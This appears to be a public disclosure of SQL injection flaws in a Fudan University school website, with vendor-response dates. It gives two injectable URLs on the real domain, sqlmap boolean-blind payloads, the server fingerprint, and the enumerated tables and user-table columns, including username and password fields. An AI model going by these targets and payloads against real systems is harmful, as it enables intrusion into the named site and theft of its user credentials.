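2015-11-09: Details reported to the vendor; awaiting vendor response
2015-11-22: The vendor has actively ignored the vulnerability; details disclosed to the public

SQL injection vulnerability in a school of Fudan University

The School of Social Development and Public Policy at Fudan University has two SQL injection points on http://www.oldssdpp.fudan.edu.cn

Injection points:
http://www.oldssdpp.fudan.edu.cn/news1.asp?id=1503
http://www.oldssdpp.fudan.edu.cn/sabout.asp?lx=small&xclassid=1&id=11

Proof: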
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lx=small&xclassid=1&id=11 AND 3692=3692
---
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1503 AND 8150=8150
---
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

Table information:
Database: Microsoft_Access_masterdb
[4 tables]
+--------+
| user   |
| books  |
| config |
| links  |
+--------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1503 AND 8150=8150
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: user
[4 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| content      | non-numeric |
| userid       | numeric     |
| username     | numeric     |
| userpassword | non-numeric |
+--------------+-------------+

You know.

Severity: No impact, ignored by vendor
Ignored at: 2015-11-22 06:40
Vulnerability Rank: 2 (WooYun rating)
None yet